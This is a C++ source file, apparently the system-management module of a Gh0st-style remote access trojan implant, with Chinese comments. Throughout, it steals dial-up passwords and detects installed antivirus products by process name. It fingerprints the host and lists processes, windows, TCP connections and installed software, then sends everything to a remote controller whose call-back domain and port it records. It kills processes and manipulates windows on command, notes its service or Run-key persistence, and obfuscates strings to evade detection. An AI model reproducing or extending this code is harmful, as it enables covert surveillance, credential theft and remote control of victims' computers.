// SystemManager.cpp: implementation of the CSystemManager class. // ////////////////////////////////////////////////////////////////////// #include "StdAfx.h" #include "SystemManager.h" #include "Dialupass.h" #include #include #include #pragma comment(lib,"Iphlpapi.lib") #pragma comment(lib,"Psapi.lib") #include "../until.h" typedef struct { BYTE bToken; // = 1 CHAR szCpuSpeend[32]; //cpu速度 CHAR szCpuInfo[128]; //CPU信息 CHAR szPcName[50]; //计算机名称 CHAR szUserName[32]; //用户名 CHAR szScrSize[32]; //屏幕分辨率 CHAR LineName[100]; //上线域名 CHAR LinePort[32]; //上线端口 CHAR Program[256]; //程序途径 CHAR InstallOpen[100]; //程序运行方式 CHAR szUserVirus[256]; //用户杀毒软件 DWORD Memory; //内存容量 }MESSAGEInfo; ////////////////////////////////////////////////////////////////////// enum { COMMAND_MEMOEY=100, //获取CPU内存值命令 COMMAND_STOPED, //发送停止命令 TOKEN_MEMORY //服务端发送过来内存使用值 }; #define SystemBasicInformation 0 #define SystemPerformanceInformation 2 #define SystemTimeInformation 3 #define Li2Double(x) ((double)((x).HighPart) * 4.294967296E9 + (double)((x).LowPart)) typedef struct{ DWORD dwUnknown1; ULONG uKeMaximumIncrement; ULONG uPageSize; ULONG uMmNumberOfPhysicalPages; ULONG uMmLowestPhysicalPage; ULONG uMmHighestPhysicalPage; ULONG uAllocationGranularity; PVOID pLowestUserAddress; PVOID pMmHighestUserAddress; ULONG uKeActiveProcessors; BYTE bKeNumberProcessors; BYTE bUnknown2; WORD wUnknown3; }SYSTEM_BASIC_INFORMATION; typedef struct { LARGE_INTEGER liIdleTime; DWORD dwSpare[76]; } SYSTEM_PERFORMANCE_INFORMATION; typedef struct { LARGE_INTEGER liKeBootTime; LARGE_INTEGER liKeSystemTime; LARGE_INTEGER liEXPTimeZoneBias; ULONG uCurrentTimeZoneId; DWORD dwReserved; } SYSTEM_TIME_INFORMATION; typedef LONG (WINAPI *PROCNTQSI)(UINT,PVOID,ULONG,PULONG); PROCNTQSI NtQuerySystemInformation; //////////////////////////////////////////////////////////////////////////////////////////// BOOL DebugPrivilege(const char *PName,BOOL bEnable); CSystemManager::CSystemManager(CClientSocket *pClient,UINT Ports,UCHAR Linetypes,UCHAR Opertypes,CHAR *Addressl) : CManager(pClient) { NetPort = Ports; //连接端口 NetLine = Linetypes; //连接方式 NetOpert = Opertypes; //运行类型 Linkaddress = Addressl; //连接地址 StopEvent=CreateEvent(NULL,false,false,NULL); SendProcessList(); } CSystemManager::~CSystemManager() { // TerminateThread( hSendMemoryThread, 0); // CloseHandle(hSendMemoryThread); } void CSystemManager::OnReceive(LPBYTE lpBuffer, UINT nSize) { SwitchInputDesktop(); switch (lpBuffer[0]) { case COMMAND_SYSTEMINFO: GetSystemInfo(); break; case COMMAND_PSLIST: SendProcessList(); break; case COMMAND_WSLIST: SendWindowsList(); break; case COMMAND_DIALUPASS: // 拨号密码 SendDialupassList(); break; case COMMAND_TSLIST: SendTcpList(); break; case COMMAND_KILLPROCESS: //关闭进程 KillProcess((LPBYTE)lpBuffer + 1, nSize - 1); break; case COMMAND_WINDOW_CLOSE: //向窗口发送关闭消息 CloseWindow(lpBuffer+1); break; case COMMAND_WINDOW_TEST: //最大化最小化 隐藏窗口 TestWindow(lpBuffer+1); break; case COMMAND_MEMOEY: //获取CPU内存使用情况 hSendMemoryThread= MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SendCPUAndMemoryThread, (LPVOID)this, 0, NULL); break; case COMMAND_STOPED: SetEvent(StopEvent); break; case COMMAND_rjLIST: SendSoftList(); break; default: break; } } void CSystemManager::SendProcessList() { UINT nRet = -1; LPBYTE lpBuffer = getProcessList(); if (lpBuffer == NULL) return; Send((LPBYTE)lpBuffer, LocalSize(lpBuffer)); LocalFree(lpBuffer); } void CSystemManager::SendWindowsList() { UINT nRet = -1; LPBYTE lpBuffer = getWindowsList(); if (lpBuffer == NULL) return; Send((LPBYTE)lpBuffer, LocalSize(lpBuffer)); LocalFree(lpBuffer); } void CSystemManager::SendDialupassList() { CDialupass pass; int nPacketLen = 0; int i; for (i = 0; i < pass.GetMax(); i++) { COneInfo *pOneInfo = pass.GetOneInfo(i); for (int j = 0; j < STR_MAX; j++) nPacketLen += lstrlen(pOneInfo->Get(j)) + 1; } nPacketLen += 1; LPBYTE lpBuffer = (LPBYTE)LocalAlloc(LPTR, nPacketLen); DWORD dwOffset = 1; for (i = 0; i < pass.GetMax(); i++) { COneInfo *pOneInfo = pass.GetOneInfo(i); for (int j = 0; j < STR_MAX; j++) { int nFieldLength = lstrlen(pOneInfo->Get(j)) + 1; memcpy(lpBuffer + dwOffset, pOneInfo->Get(j), nFieldLength); dwOffset += nFieldLength; } } lpBuffer[0] = TOKEN_DIALUPASS; Send((LPBYTE)lpBuffer, LocalSize(lpBuffer)); LocalFree(lpBuffer); } void CSystemManager::KillProcess(LPBYTE lpBuffer, UINT nSize) //关闭程序 { HANDLE hProcess = NULL; for (unsigned int i = 0; i < nSize; i += 4) { DWORD Ipsid = *(LPDWORD)(lpBuffer + i); hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_ALL_ACCESS,FALSE,Ipsid); TerminateProcess(hProcess, 0); CloseHandle(hProcess); } // 稍稍Sleep下,防止出错 Sleep(200); // 刷新进程列表 SendProcessList(); // 刷新窗口列表 // SendWindowsList(); } LPBYTE CSystemManager::getProcessList() { HANDLE hSnapshot = NULL; HANDLE hProcess = NULL; HMODULE hModules = NULL; PROCESSENTRY32 pe32 = {0}; DWORD cbNeeded; char strProcessName[MAX_PATH] = {0}; LPBYTE lpBuffer = NULL; DWORD dwOffset = 0; DWORD dwLength = 0; DebugPrivilege(SE_DEBUG_NAME, TRUE); //提取权限 //创建系统快照 hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hSnapshot == INVALID_HANDLE_VALUE) return NULL; pe32.dwSize = sizeof(PROCESSENTRY32); lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024); //暂时分配一下缓冲区 lpBuffer[0] = TOKEN_PSLIST; dwOffset = 1; if(Process32First(hSnapshot, &pe32)) //得到第一个进程顺便判断一下系统快照是否成功 { do { //打开进程并返回句柄 hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID); if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8)) { //枚举第一个模块句柄也就是自身 EnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded); //得到自身的完整名称 GetModuleFileNameEx(hProcess, hModules, strProcessName, sizeof(strProcessName)); //开始计算占用的缓冲区, 我们关心他的发送的数据结构 // 此进程占用数据大小 dwLength = sizeof(DWORD) + lstrlen(pe32.szExeFile) + lstrlen(strProcessName) + 2; // 缓冲区太小,再重新分配下 if (LocalSize(lpBuffer) < (dwOffset + dwLength)) lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE); //数据结构是 进程ID+进程名+0+进程完整名+0 memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD)); dwOffset += sizeof(DWORD); memcpy(lpBuffer + dwOffset, pe32.szExeFile, lstrlen(pe32.szExeFile) + 1); dwOffset += lstrlen(pe32.szExeFile) + 1; memcpy(lpBuffer + dwOffset, strProcessName, lstrlen(strProcessName) + 1); dwOffset += lstrlen(strProcessName) + 1; } CloseHandle(hProcess);//新修改 } while(Process32Next(hSnapshot, &pe32)); //继续得到下一个快照 } //用lpbuffer获得整个缓冲去 lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE); DebugPrivilege(SE_DEBUG_NAME, FALSE); //还原提权 CloseHandle(hSnapshot); //释放句柄 return lpBuffer; //数据返回 } BOOL DebugPrivilege(const char *PName,BOOL bEnable) { BOOL bResult = TRUE; HANDLE hToken; TOKEN_PRIVILEGES TokenPrivileges; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) { bResult = FALSE; return bResult; } TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0; LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid); AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL); if (GetLastError() != ERROR_SUCCESS) { bResult = FALSE; } CloseHandle(hToken); return bResult; } bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam) { DWORD dwLength = 0; DWORD dwOffset = 0; DWORD dwProcessID = 0; LPBYTE lpBuffer = *(LPBYTE *)lParam; char strTitle[1024]; try { GetWindowText(hwnd, strTitle, sizeof(strTitle)-1); strTitle[sizeof(strTitle)-1]=0; if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0) return true; if (lpBuffer == NULL) { lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1); dwOffset=1; }else { dwOffset = LocalSize(lpBuffer); while(*(lpBuffer + dwOffset - 2)==0) dwOffset--; } dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1; lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE); }catch (...) { return true; } GetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset)); memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1); *(LPBYTE *)lParam = lpBuffer; return true; } /* memset(strTitle, 0, sizeof(strTitle)); //得到系统传递进来的窗口句柄的窗口标题 GetWindowText(hwnd, strTitle, sizeof(strTitle)); //这里判断 窗口是否可见 或标题为空 if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0) return true; //同进程管理一样我们注意他的发送到主控端的数据结构 if (lpBuffer == NULL) lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1); //暂时分配缓冲区 dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1; dwOffset = LocalSize(lpBuffer); //重新计算缓冲区大小 lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE); //下面两个memcpy就能看到数据结构为 hwnd+窗口标题+0 memcpy((lpBuffer+dwOffset),&hwnd,sizeof(DWORD)); memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1); *(LPBYTE *)lParam = lpBuffer; return true; } */ LPBYTE CSystemManager::getWindowsList() { LPBYTE lpBuffer = NULL; EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer); lpBuffer[0] = TOKEN_WSLIST; return lpBuffer; } //获取内存使用情况 void SendCPUAndMemoryInfo(DWORD d,LPVOID lparam) { CSystemManager *pThis = (CSystemManager *)lparam; char buf[12]; ZeroMemory(buf,12); buf[0]=TOKEN_MEMORY; MEMORYSTATUS mem; ::GlobalMemoryStatus(&mem); memcpy(buf+1,(void*)&mem.dwAvailPhys,sizeof(DWORD)); //内存 memcpy(buf+1+sizeof(DWORD),(void*)&d,sizeof(DWORD)); pThis->Send((unsigned char *)buf,12); } DWORD WINAPI CSystemManager::SendCPUAndMemoryThread(LPVOID lparam) { CSystemManager *pThis = (CSystemManager *)lparam; // Sleep(3000); SYSTEM_PERFORMANCE_INFORMATION SysPerfInfo; SYSTEM_TIME_INFORMATION SysTimeInfo; SYSTEM_BASIC_INFORMATION SysBaseInfo; double dbIdleTime; double dbSystemTime; LONG status; LARGE_INTEGER liOldIdleTime = {0,0}; LARGE_INTEGER liOldSystemTime = {0,0}; NtQuerySystemInformation = (PROCNTQSI)GetProcAddress(GetModuleHandle("ntdll"),"NtQuerySystemInformation"); if (!NtQuerySystemInformation) return 0; // get number of processors in the system status = NtQuerySystemInformation(SystemBasicInformation,&SysBaseInfo,sizeof(SysBaseInfo),NULL); if (status != NO_ERROR) return 0; //printf(" CPU Usage (press any key to exit): "); BYTE count=0; while(1) { // get new system time status = NtQuerySystemInformation(SystemTimeInformation,&SysTimeInfo,sizeof(SysTimeInfo),0); if (status!=NO_ERROR) return 0; // get new CPU's idle time status = NtQuerySystemInformation(SystemPerformanceInformation,&SysPerfInfo,sizeof(SysPerfInfo),NULL); if (status != NO_ERROR) return 0; // if it's a first call - skip it if (liOldIdleTime.QuadPart != 0) { // CurrentValue = NewValue - OldValue dbIdleTime = Li2Double(SysPerfInfo.liIdleTime) - Li2Double(liOldIdleTime); dbSystemTime = Li2Double(SysTimeInfo.liKeSystemTime) -Li2Double(liOldSystemTime); // CurrentCpuIdle = IdleTime / SystemTime dbIdleTime = dbIdleTime / dbSystemTime; // CurrentCpuUsage% = 100 - (CurrentCpuIdle * 100) / NumberOfProcessors dbIdleTime = 100.0 - dbIdleTime * 100.0 /(double)SysBaseInfo.bKeNumberProcessors + 0.5; SendCPUAndMemoryInfo((unsigned long)dbIdleTime,lparam); } // store new CPU's idle and system time liOldIdleTime = SysPerfInfo.liIdleTime; liOldSystemTime = SysTimeInfo.liKeSystemTime; if (WaitForSingleObject(pThis->StopEvent,3000)==WAIT_OBJECT_0) { break; } } pThis->m_pClient->Disconnect(); return true; } ///////////////////////////////////////////杀毒显示//////////////////////////////////// typedef struct { char *Course; char *Name; }ANTIVIRUS; ANTIVIRUS g_AntiVirus_Data[20] = { {"360tray.exe", "360安全卫士"}, {"360sd.exe", "360杀毒"}, {"avp.exe", "卡巴斯基"}, {"KvMonXP.exe", "江民杀毒"}, {"RavMonD.exe", "瑞星杀毒"}, {"Mcshield.exe", "麦咖啡"}, {"egui.exe", "NOD32"}, {"kxetray.exe", "金山毒霸"}, {"knsdtray.exe", "可牛杀毒"}, {"TMBMSRV.exe", "趋势杀毒"}, {"avcenter.exe", "Avira(小红伞)"}, {"ashDisp.exe", "Avast网络安全"}, {"rtvscan.exe", "诺顿杀毒"}, {"ksafe.exe", "金山卫士"}, {"QQPCRTP.exe", "QQ电脑管家"}, {" ", " "} }; char* GetViru() { static char AllName[1024]; int t=0; memset(AllName, 0, sizeof(AllName)); while(1) { if (strstr(g_AntiVirus_Data[t].Course, " " ) == 0 ) { if (GetProcessID(g_AntiVirus_Data[t].Course)) { lstrcat( AllName, g_AntiVirus_Data[t].Name); lstrcat( AllName, " " ); } } else break; t++; } if (strstr(AllName, " " ) == 0 ) { lstrcat(AllName , "未发现 "); } return AllName; } //========================================================= BOOL GetTokenByName(HANDLE &hToken,LPSTR lpName) { if(!lpName) { return FALSE; } HANDLE hProcessSnap = NULL; BOOL bRet = FALSE; PROCESSENTRY32 pe32 = {0}; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) return (FALSE); pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hProcessSnap, &pe32)) { do { _strupr(pe32.szExeFile); if(!strcmp(pe32.szExeFile,lpName)) { HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,pe32.th32ProcessID); bRet = OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken); CloseHandle (hProcessSnap); return (bRet); } } while (Process32Next(hProcessSnap, &pe32)); bRet = TRUE; } else bRet = FALSE; CloseHandle (hProcessSnap); return (bRet); } //=================获得当前登陆用户名及计算机名称==================== BOOL GetCurrentUserName(char szUser[],char szDomain[]) { HANDLE hToken; //得到shell的token if(!GetTokenByName(hToken,"EXPLORER.EXE")) { return FALSE; } DWORD cbti = 0; PTOKEN_USER ptiUser = NULL; SID_NAME_USE snu; //取得所需空间大小 if (GetTokenInformation(hToken, TokenUser, NULL, 0, &cbti)) { CloseHandle(hToken); return FALSE; } //分配空间 ptiUser = (PTOKEN_USER) HeapAlloc(GetProcessHeap(), 0, cbti); if(!ptiUser) { CloseHandle(hToken); return FALSE; } //取得token信息 if (!GetTokenInformation(hToken, TokenUser, ptiUser, cbti, &cbti)) { CloseHandle(hToken); HeapFree(GetProcessHeap(), 0, ptiUser); return FALSE; } DWORD nUser = 50; DWORD nDomain = 50; //根据用户的sid得到用户名和domain if (!LookupAccountSid(NULL, ptiUser->User.Sid, szUser, &nUser, szDomain, &nDomain, &snu)) { CloseHandle(hToken); HeapFree(GetProcessHeap(), 0, ptiUser); return FALSE; } CloseHandle(hToken); HeapFree(GetProcessHeap(), 0, ptiUser); return TRUE; } void GetCurrentUserNamet(char szUser[]) { char TszUser[50]={0}; char TszDomain[50]={0}; if(GetCurrentUserName(TszUser,TszDomain)) { wsprintf(szUser,"%s",TszUser); } else { wsprintf(szUser,"%s","无用户登陆状态!"); } } void CSystemManager::NetSystem(UINT Port) { NetPort = Port; //连接端口 } extern char* MyDecode(char *str); void CSystemManager::GetSystemInfo() { MESSAGEInfo Infomsg; //获取操作系统相关信息 Infomsg.bToken = TOKEN_SYSTEMINFO; //////////////CPU Speed///////////////// DWORD dwCpu, dwBufLen; HKEY hKey; char JYvni02[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0'}; RegOpenKeyEx( HKEY_LOCAL_MACHINE, JYvni02, 0, KEY_QUERY_VALUE, &hKey ); dwBufLen = sizeof(DWORD); RegQueryValueEx( hKey, ("~MHz"), NULL, NULL,(LPBYTE)&dwCpu, &dwBufLen); RegCloseKey(hKey); wsprintf(Infomsg.szCpuSpeend,("~%u MHz"), dwCpu); //Get CPU Info=============================== CHAR SubKey[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0','\0'}; hKey = NULL; if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS) { DWORD dwType; DWORD dwSize = 128 * sizeof(TCHAR); char ValueSz[MAX_PATH]={0}; if(RegQueryValueEx(hKey,("ProcessorNameString"),NULL,&dwType,(BYTE *)ValueSz,&dwSize) == ERROR_SUCCESS) strcpy(Infomsg.szCpuInfo,DelSpace(ValueSz)); RegCloseKey(hKey); } //Get Computer & User Name======================== DWORD dwLen = sizeof(Infomsg.szPcName); GetComputerNameA(Infomsg.szPcName, &dwLen); //获取当前用户名及计算机名称 GetCurrentUserNamet(Infomsg.szUserName); //Get Screen Size================================= ////////////////////////////////////////////////// wsprintf(Infomsg.szScrSize, ("%d * %d"), GetSystemMetrics(SM_CXSCREEN),GetSystemMetrics(SM_CYSCREEN)); // if(NetLine==0) // wsprintf(Infomsg.LineName,"域名IP上线:%s",Linkaddress); //域名上线写入 // if(NetLine==1) // wsprintf(Infomsg.LineName,"QQ空间上线:%s",Linkaddress); //QQ上线写入 // if(NetLine==2) // wsprintf(Infomsg.LineName,"网盘上线:%s",Linkaddress); //网盘上线写入 char *lpszHost = NULL; DWORD dwPort = 80; lpszHost = Linkaddress; dwPort = NetPort; char Linkaddress[MAX_PATH]={0}; char strTMPTime[MAX_PATH]={0}; char strTMPHostB[MAX_PATH]={0}; // wsprintf(strTMPHostA, "%s","域名上线"); wsprintf(Infomsg.LineName,"域名IP上线:%s",lpszHost); //域名上线写入 wsprintf(Infomsg.LinePort,"%d",NetPort); //上线端口写入 char szbuf[256]; GetModuleFileName(NULL,szbuf,MAX_PATH); //用于获取程序本身路径 wsprintf(Infomsg.Program,"%s",szbuf ); if(NetOpert==0) //绿色一次性运行 { wsprintf(Infomsg.InstallOpen,"%s","(绿色运行模式)--重启不上线!"); //上线运行方式 } else if(NetOpert==1) // 服务启动运行 { wsprintf(Infomsg.InstallOpen,"%s","(服务启动模式)--SYSTEM用户运行!"); //上线运行方式 } else if(NetOpert==2) // 直接启动运行 { wsprintf(Infomsg.InstallOpen,"%s","(Run启动模式)--当前用户运行!"); //上线运行方式 } wsprintf(Infomsg.szUserVirus,"%s",GetViru()); //杀毒软件 //内存大小 MEMORYSTATUSEX MemInfo; //用GlobalMemoryStatusEx可显示2G以上内存 MemInfo.dwLength=sizeof(MemInfo); GlobalMemoryStatusEx(&MemInfo); Infomsg.Memory = (unsigned long)MemInfo.ullTotalPhys/1024/1024; Send((LPBYTE)&Infomsg, sizeof(MESSAGEInfo)); } void CSystemManager::CloseWindow(LPBYTE buf) { DWORD hwnd; memcpy(&hwnd,buf,sizeof(DWORD)); //得到窗口句柄 ::PostMessage((HWND__ *)hwnd,WM_CLOSE,0,0); //向窗口发送关闭消息 Sleep(200); SendWindowsList(); //窗口显示刷新 } void CSystemManager::TestWindow(LPBYTE buf) { DWORD hwnd; DWORD dHow; memcpy((void*)&hwnd,buf,sizeof(DWORD)); //得到窗口句柄 memcpy(&dHow,buf+sizeof(DWORD),sizeof(DWORD)); //得到窗口处理参数 ShowWindow((HWND__ *)hwnd,dHow); } bool CSystemManager::DebugPrivilege(const char *PName,BOOL bEnable) { typedef BOOL (WINAPI *GetLastErrorT) ( VOID ); char FhTZBW[] = {'G','e','t','L','a','s','t','E','r','r','o','r','\0'}; GetLastErrorT pGetLastError = (GetLastErrorT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FhTZBW); BOOL bResult = TRUE; HANDLE hToken; TOKEN_PRIVILEGES TokenPrivileges; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) { bResult = FALSE; return bResult; } TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0; LookupPrivilegeValueA(NULL, PName, &TokenPrivileges.Privileges[0].Luid); AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL); if (pGetLastError() != ERROR_SUCCESS) { bResult = FALSE; } CloseHandle(hToken); return bResult; } void CSystemManager::SendTcpList() { UINT nRet = -1; LPBYTE lpBuffer = getTcpList(); if (lpBuffer == NULL) return; Send((LPBYTE)lpBuffer, LocalSize(lpBuffer)); LocalFree(lpBuffer); } //TCP 端口状态. static char TcpState[][32] = { "???", "CLOSED", "LISTEN", "SYN_SENT", "SYN_RCVD", "ESTABLISHED", "FIN_WAIT1", "FIN_WAIT2", "ITMED_WAIT", "CLOSING", "LAST_ACK", "TIME_WAIT", "DELETE_TCB" }; // 生成IP地址字符串. PCHAR GetIP(unsigned int ipaddr) { static char pIP[20]; unsigned int nipaddr = htonl(ipaddr); wsprintf(pIP, "%d.%d.%d.%d", (nipaddr >>24) &0xFF, (nipaddr>>16) &0xFF, (nipaddr>>8) &0xFF, (nipaddr)&0xFF); return pIP; } LPBYTE CSystemManager::getTcpList() { LPBYTE lpBuffer = NULL; DWORD dwOffset = 0; DWORD dwLength = 0; char cLocalAddr[MAX_PATH] = {0}; char cLocalPort[MAX_PATH] = {0}; char cRemoteAddr[MAX_PATH] = {0}; char cRemotePort[MAX_PATH] = {0}; char cState[MAX_PATH] = {0}; DWORD dwState; lpBuffer = (LPBYTE)LocalAlloc(LPTR, 10240); lpBuffer[0] = TOKEN_TSLIST; dwOffset = 1; DWORD dwSize = 10240; BYTE pData[10240]; // 定义数据缓冲区且缓冲区大小为10240字节 MIB_TCPTABLE *pTCPTable = (MIB_TCPTABLE*)pData; memset(pData,0,dwSize); // 获取TCP列表信息 GetTcpTable(pTCPTable,&dwSize,TRUE); // 读取TCP列表数据 for (DWORD i = 0; i < pTCPTable->dwNumEntries; i++) { wsprintf(cLocalAddr, "%s",GetIP(pTCPTable->table[i].dwLocalAddr)); // 本地IP地址 wsprintf(cLocalPort, "%d",htons((WORD)pTCPTable->table[i].dwLocalPort)); // 本地端口 wsprintf(cRemoteAddr, "%s",GetIP(pTCPTable->table[i].dwRemoteAddr)); // 远程IP地址 wsprintf(cRemotePort, "%d",htons((WORD)pTCPTable->table[i].dwRemotePort)); // 远程端口 dwState = pTCPTable->table[i].dwState; // 连接状态 if (dwState < 13) { wsprintf(cState,"%s",TcpState[dwState]); } dwLength = lstrlen(cLocalAddr) + lstrlen(cLocalPort) + lstrlen(cRemoteAddr) + lstrlen(cRemotePort)+ lstrlen(cState) + 5; // 缓冲区太小,再重新分配下 if (LocalSize(lpBuffer) < (dwOffset + dwLength)) lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE); memcpy(lpBuffer + dwOffset, cLocalAddr, lstrlen(cLocalAddr) + 1); dwOffset += lstrlen(cLocalAddr) + 1; memcpy(lpBuffer + dwOffset, cLocalPort, lstrlen(cLocalPort) + 1); dwOffset += lstrlen(cLocalPort) + 1; memcpy(lpBuffer + dwOffset, cRemoteAddr, lstrlen(cRemoteAddr) + 1); dwOffset += lstrlen(cRemoteAddr) + 1; memcpy(lpBuffer + dwOffset, cRemotePort, lstrlen(cRemotePort) + 1); dwOffset += lstrlen(cRemotePort) + 1; memcpy(lpBuffer + dwOffset, cState, lstrlen(cState) + 1); dwOffset += lstrlen(cState) + 1; } lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE); return lpBuffer; } void CSystemManager::SendSoftList() { UINT nRet = -1; LPBYTE lpBuffer = getSoftList(); if (lpBuffer == NULL) return; Send((LPBYTE)lpBuffer, LocalSize(lpBuffer)); LocalFree(lpBuffer); } LPBYTE CSystemManager::getSoftList() { LPBYTE lpBuffer = NULL; DWORD dwOffset = 0; DWORD dwLength = 0; lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024); lpBuffer[0] = TOKEN_rjLIST; dwOffset = 1; char szSubKey[MAX_PATH] = ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"); HKEY hKey,hSubKey; LONG lRetVal,lRetVal2; DWORD nIndex = 0; DWORD nNameLen = MAX_PATH; // 程序名长度 DWORD nDisplayLen = MAX_PATH; // 显示长度 DWORD nUninstallLen = MAX_PATH; char szName[MAX_PATH],szDispayName[MAX_PATH],szUninstall[MAX_PATH]; lRetVal = RegOpenKeyEx(HKEY_LOCAL_MACHINE,szSubKey,0,KEY_ALL_ACCESS,&hKey); // 获取注册表信息 DWORD nAttribute = REG_BINARY|REG_DWORD|REG_SZ|REG_EXPAND_SZ|REG_MULTI_SZ|REG_NONE; // 设置属性 // 开始枚举 if (ERROR_SUCCESS == lRetVal) { lRetVal = RegEnumKeyEx(hKey,nIndex,szName,&nNameLen,0,NULL,NULL,0); while(lRetVal != ERROR_NO_MORE_ITEMS) { nIndex++; if (lstrcmpi(szName,"") == 0) continue; wsprintf(szUninstall,"%s\\%s",szSubKey,szName); // 得到全名 memset(szDispayName,0,MAX_PATH); nDisplayLen = MAX_PATH; lRetVal2 = RegOpenKeyEx(HKEY_LOCAL_MACHINE,szUninstall,0,KEY_ALL_ACCESS,&hSubKey); // 查找 if (lRetVal2 == ERROR_SUCCESS) { RegQueryValueEx(hSubKey,"DisplayName",0,&nAttribute,(LPBYTE)szDispayName,&nDisplayLen); if (lstrcmpi(szDispayName,"") != 0) { dwLength = lstrlen(szDispayName) + 1; // 缓冲区太小,再重新分配下 if (LocalSize(lpBuffer) < (dwOffset + dwLength)) lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE); memcpy(lpBuffer + dwOffset, szDispayName, dwLength - 1); dwOffset += lstrlen(szDispayName) + 1;//添加文件名到列表 } } nNameLen = MAX_PATH; memset(szName,0,MAX_PATH); lRetVal = RegEnumKeyEx(hKey,nIndex,szName,&nNameLen,0,NULL,NULL,0); } } RegCloseKey(hKey); lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE); return lpBuffer; } void CSystemManager::ShutdownWindows( DWORD dwReason ) { DebugPrivilege(SE_SHUTDOWN_NAME,TRUE); ExitWindowsEx(dwReason, 0); DebugPrivilege(SE_SHUTDOWN_NAME,FALSE); }